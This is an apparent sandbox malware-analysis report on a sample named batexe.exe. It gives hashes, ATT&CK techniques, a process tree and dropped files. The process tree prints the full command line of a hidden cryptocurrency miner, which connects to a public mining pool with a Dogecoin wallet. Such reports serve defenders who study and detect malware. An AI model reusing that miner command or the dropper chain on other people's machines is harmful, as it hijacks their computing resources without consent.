73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72

Analysis

max time kernel
293s
max time network
307s
platform
windows10-2004_x64
resource
win10v2004-20231215-ja
resource tags

arch:x64arch:x86image:win10v2004-20231215-jalocale:ja-jpos:windows10-2004-x64systemwindows
submitted
12/02/2024, 00:39

Sharing

Copy URL

Twitter E-mail

Report Analysis Logs

General

Target

batexe.exe
Size

9.4MB
MD5

cdc9eacffc6d2bf43153815043064427
SHA1

d05101f265f6ea87e18793ab0071f5c99edf363f
SHA256

73cc2881ef511788661955a624db9baf40ac16bc63266c5c3bb3fe62b4856d72
SHA512

fc6945957e160bf7059c936c329aae438e6c1521e5e43a8434f58058230d89e818eb6ff80331a4b952dbb600b8cc134ecba54e5641bf549723c98f85e993fde6
SSDEEP

196608:ERAefrn9wcsTRAJgwusnWpV3h9XxSeEGaT+TKkGzySdUkI56kBIyky:E5Tn9YVwdnWLXxkvLlzkuv

Score

7^/10

upx

Malware Config

Signatures

Checks computer location settings 2 TTPs 2 IoCs

Looks up country code configured in the registry, likely geofence.

Query Registry

T1012

System Information Discovery

T1082

description	ioc	Process
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	batexe.exe
Key value queried	\REGISTRY\USER\S-1-5-21-3073191680-435865314-2862784915-1000\Control Panel\International\Geo\Nation	b2e.exe

Executes dropped EXE 2 IoCs

pid	Process
4524	b2e.exe
4416	cpuminer-sse2.exe

Loads dropped DLL 5 IoCs

pid	Process
4416	cpuminer-sse2.exe
4416	cpuminer-sse2.exe
4416	cpuminer-sse2.exe
4416	cpuminer-sse2.exe
4416	cpuminer-sse2.exe

UPX packed file 1 IoCs

Detects executables packed with UPX/modified UPX open source packer.

upx

resource	yara_rule
behavioral2/memory/2916-9-0x0000000000400000-0x000000000393A000-memory.dmp	upx

Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).

System Information Discovery
T1082

Suspicious use of WriteProcessMemory 8 IoCs

description	pid	Process	procid_target
PID 2916 wrote to memory of 4524	2916	batexe.exe	81
PID 2916 wrote to memory of 4524	2916	batexe.exe	81
PID 2916 wrote to memory of 4524	2916	batexe.exe	81
PID 4524 wrote to memory of 4492	4524	b2e.exe	82
PID 4524 wrote to memory of 4492	4524	b2e.exe	82
PID 4524 wrote to memory of 4492	4524	b2e.exe	82
PID 4492 wrote to memory of 4416	4492	cmd.exe	85
PID 4492 wrote to memory of 4416	4492	cmd.exe	85

C:\Users\Admin\AppData\Local\Temp\batexe.exe
"C:\Users\Admin\AppData\Local\Temp\batexe.exe"
1⤵
- Checks computer location settings
- Suspicious use of WriteProcessMemory
PID:2916
- C:\Users\Admin\AppData\Local\Temp\4ED.tmp\b2e.exe
  "C:\Users\Admin\AppData\Local\Temp\4ED.tmp\b2e.exe" C:\Users\Admin\AppData\Local\Temp\4ED.tmp\b2e.exe C:\Users\Admin\AppData\Local\Temp "C:\Users\Admin\AppData\Local\Temp\batexe.exe"
  2⤵
  - Checks computer location settings
  - Executes dropped EXE
  - Suspicious use of WriteProcessMemory
  PID:4524
- - C:\Windows\SysWOW64\cmd.exe
    C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\1364.tmp\batchfile.bat" "
    3⤵
    - Suspicious use of WriteProcessMemory
    PID:4492
  - - C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe
      cpuminer-sse2.exe -a yespower -o stratum+tcp://yespower.sea.mine.zpool.ca:6234 --userpass=DJXKcu8iouhRppneQL9XbYQ9ovs87y4cYZ:c=doge -t 3
      4⤵
      Executes dropped EXE
      Loads dropped DLL
      PID:4416

Network

MITRE ATT&CK Enterprise v15

Reconnaissance

Resource Development

Initial Access

Execution

Persistence

Privilege Escalation

Defense Evasion

Credential Access

Discovery

Query Registry

T1012

System Information Discovery

T1082

Lateral Movement

Collection

Command and Control

Exfiltration

Impact

Replay Monitor

Loading Replay Monitor...

Downloads

C:\Users\Admin\AppData\Local\Temp\1364.tmp\batchfile.bat

Filesize
136B

MD5
8ea7ac72a10251ecfb42ef4a88bd330a

SHA1
c30f6af73a42c0cc89bd20fe95f9159d6f0756c5

SHA256
65e2674fc9b921a76deaf3740603359794c04e059e8937ab36eb931d65f40ec9

SHA512
a908979d588625aa24eb81238d07d88a56be5388e1265ebd2fe09889ed807aa9a4af77107e72a843c31acadbe06db0d7f6f6a3c95fb481a71e549e8eb74c2ff0

Download Submit
C:\Users\Admin\AppData\Local\Temp\4ED.tmp\b2e.exe

Filesize
4.8MB

MD5
213b6e2eb3cfab9d1dae3f8b21b7d4d1

SHA1
a8937828d7ce515eb48dc01c540928fed285b539

SHA256
85b2b8d51c4c785cf89931f86abc3c6566c839ae27432f996ed1f031d7433d6f

SHA512
adf3b22d0683ea66a3252a5088eca3970f8050bfd9798ac9dfe473b62464a711ac20bf75c4194a2146f57e2085edb91997c4748910de85b5231c9576f537fac9

Download Submit
C:\Users\Admin\AppData\Local\Temp\4ED.tmp\b2e.exe

Filesize
1.1MB

MD5
200e2734d9f0f058722091c16638c3dc

SHA1
8743c395aefc1708d7687cbf2247aec795f8ccb3

SHA256
c32af94e0fd03f0c2637c182f7dc8f035b06c69da9aa5d29ca49bb2f761d7fff

SHA512
b129cf51bea110a2d8d5554b1787fcc27222f02514328b3579532afc8f115a401aef4417a36f77b648937811bd5c2b9719174deb736fa033dbc3e263f9e06de3

Download Submit
C:\Users\Admin\AppData\Local\Temp\4ED.tmp\b2e.exe

Filesize
923KB

MD5
832e14c9d167cde89172830b39d93eb1

SHA1
52415cc8e919fa9ddefe110278563bc95780cd6b

SHA256
f4c8e72487c6f6a77d7506b5ada530c946de7ad416275f037a67f38a8e849a42

SHA512
cc27756dfe3c9033d60dbb99857d679a19d969bb4051103fd636496a6363858c5b3075b010a13296a6b8b94538cd525cc1700b188f6e61769f055f391b649fb0

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
142KB

MD5
c0e0745f909682767444b2d19f46f008

SHA1
097a777e3e1aac07fcf96adb2464185de95ca5ef

SHA256
cd211cb5925e953f691463b4af305ba859f87054853c2eac8a04237ecb2c33eb

SHA512
f9e61292bd84d37df05d380660b34aaf42afc5ac31c432346db5afe5ba66a762fa945394f88bee8748b87088334a5aaa1ac463db7379a84f82abf3f471801277

Download Submit
C:\Users\Admin\AppData\Local\Temp\cpuminer-sse2.exe

Filesize
332KB

MD5
cb339a18e15c25b6ebd7425b1fdf1e94

SHA1
513c69a99b858cc587ab6dd2c5a9aee4325c8961

SHA256
039d523e00a5c36443f75140d82fcb7e3bc2714cf67aa5e722909b8fbc55dfd7

SHA512
991b464b42abe0b8f92ac030aea878efd10b655a908bba6e37170002f5f3f0b1d2835328e42a51ab5a2c7aa26e96e5a2a191e2a9afc3e83ce34509c52a4a5ed1

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
136KB

MD5
95a4a673915046b89c23c389165810d7

SHA1
55d5121a5ed36f64b43046dc96059a8cad1b09eb

SHA256
b9835076ee2d6466bc81ec32c1165d9d802395e47c49948379973f9bf97b41ea

SHA512
300f0f3c80e188de6974af7bc81c185bf9a46b8b4849788dfb016b9453935798801deefcb03cad8551d1773c85c38de4b1cc575efb921d030bfb796a551e623d

Download Submit
C:\Users\Admin\AppData\Local\Temp\libcurl-4.dll

Filesize
128KB

MD5
1f5d928a6f59ace71d8c7f67d8b2518b

SHA1
f2fb3d90779b4fc03ad11854539a73c0856579a6

SHA256
b3793ba498955a9800ae511c23ef644fcdb44fcaa731c623230e3d423be74195

SHA512
39c3949d3ba42b3547947f6fa1f9c2bc4c98919453c9ef200947d4f1fea68fa40d994881fc56e207925afac5325547db2f244eae67d1c3a7bae1f48388dbfda6

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
151KB

MD5
d4248ddaa2847e88f40e40c4498b3647

SHA1
0de30d451fd808bbcf60ce6fa02c3ecafc395fe4

SHA256
cbc5a19f9ba64637b5a11b6369cb53712378afeb41be98ab3a285a0bed9ed35f

SHA512
4d2a0a7073500533caeb97ec40ee6333c985619346953f939bb99d24e5749584211a8b5aa2b1834f38958527db1c2708f16251497ebf5d023f515aa991a8d847

Download Submit
C:\Users\Admin\AppData\Local\Temp\libgcc_s_seh-1.dll

Filesize
172KB

MD5
761829b337a61338dc9c3810c803392c

SHA1
4337ce2b3176ac5c99560da4819e8b3827f1c313

SHA256
2cfd998821c99ca3e1ae85d8f64b5bf74c20e35d530918d0217f5f4181d22971

SHA512
a7f12e046ae11840fa6bf5d7d58b2f91f8a45407a0d4158a9fc270cb57999a09889ab603a3b23ff55fb219bc9f59ef08355c8cd0e8b9c633e89b8338343e36f2

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
163KB

MD5
1b8f462d06b66e06fab2d2de06aed891

SHA1
a1b74ef72fb279745389169ebfc43cce525b9fb5

SHA256
e22408e0a4e58a1c98f3f057a35d837268147e186c586db3d0cfedebdc31ad2c

SHA512
54e5464a568ab5404c3784f5ad5aef0b1c104d70b57d86ce5fae32e31610060557910827fc8c70048cf32006970dfe6bc8de86f5d72ed87a1aa6e7ec6c226b7e

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
256KB

MD5
1d86b9560854472453237bcbaa2e253f

SHA1
5a03a7902d250377a3e9f746badcb696e2c98228

SHA256
1493703a430c68bdcedcb4078486daca39a02820199e7b72017c7b1af66e1c8d

SHA512
afbc3d7f8e06e41db25d666999f4d162af7054a66b17a651ac8a7f092f83580a067bfa2f558be65ace5966dffaa8735fe7a579e88bf42b34eaa3e72cdec96699

Download Submit
C:\Users\Admin\AppData\Local\Temp\libstdc++-6.dll

Filesize
209KB

MD5
1a6e3b05fa3f488868a19949dc733dfa

SHA1
0bbe15cc6741291c1051023eb894dfe1e6e1f6e6

SHA256
86714552eb24a3bedee2c02b3b142bf5c33487feb8aaeb40c5b496c631958a3b

SHA512
414f7bf23a6c93285e9fc1dcac85aca01248da301fe01fa7b02b9135a81946b08027e2bc039463278e47568ebbd72f0abedb1b7f94ac096c8b968870189777d8

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
175KB

MD5
a2b91d9f33fc7434edd1bbee5afd2049

SHA1
c681fef9c3b88c126bfa952023af4943300fc47d

SHA256
e501fc69532eb5038c783875a0bdb5291053232c972c5a24bc0bd9b5df344700

SHA512
cc97f68d6eb360772eaa2355261385fc90e21a5365e6741f7d0fddd7296e934ebb5dd373e7474eb67bad87154f7bc58e28adea3a269fdde01a07c87958765b43

Download Submit
C:\Users\Admin\AppData\Local\Temp\libwinpthread-1.dll

Filesize
167KB

MD5
c02e51f211f47c39de95a3a4e4ae3219

SHA1
1b5d03de1b8d265bd10c6763b5d16e06c611ae0f

SHA256
07ee112dfe59d0faaa15a7eb21b9f0d3414a391705e5270ae2c6647db3de9182

SHA512
ea0fe92d0a6ebe3df71134868327bc20676d6abaa3c3296e6fc9c2dd6ffd9020ca38f42b0f855d196c4d2f55f4077517b883089a787d659fb404ad046b10b6fc

Download Submit
memory/2916-9-0x0000000000400000-0x000000000393A000-memory.dmp

Filesize
53.2MB

Download
memory/4416-47-0x0000000001090000-0x0000000002945000-memory.dmp

Filesize
24.7MB

Download
memory/4416-83-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4416-46-0x00000000635D0000-0x0000000063668000-memory.dmp

Filesize
608KB

Download
memory/4416-45-0x0000000061440000-0x000000006156B000-memory.dmp

Filesize
1.2MB

Download
memory/4416-43-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4416-113-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4416-48-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4416-108-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4416-68-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4416-78-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4416-44-0x0000000070800000-0x00000000708BC000-memory.dmp

Filesize
752KB

Download
memory/4416-88-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4416-93-0x0000000000400000-0x0000000000667000-memory.dmp

Filesize
2.4MB

Download
memory/4524-53-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download
memory/4524-8-0x0000000000400000-0x0000000000405000-memory.dmp

Filesize
20KB

Download